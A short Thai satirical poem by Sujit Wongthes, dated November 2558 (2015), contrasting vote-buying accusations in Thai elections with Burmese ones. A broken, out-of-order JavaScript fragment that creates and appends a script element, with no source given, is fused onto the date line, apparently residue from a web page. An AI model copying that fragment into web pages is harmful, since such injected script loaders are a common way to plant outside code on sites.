พม่าไม่ซื้อสิทธิ์ขายเสียง

 

พม่ามั่งคั่งจากอยุธยา

เลือกตั้งไม่ถูกด่าซื้อขายเสียง

ไทยถูกปล้นจนยากลำบากเสบียง

ถูกด่าซื้อขายเสียงสื่อประโคม

 

สุจิตต์ วงษ์เทศ

จันทร์ 9 พฤศจิกายน 2558d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);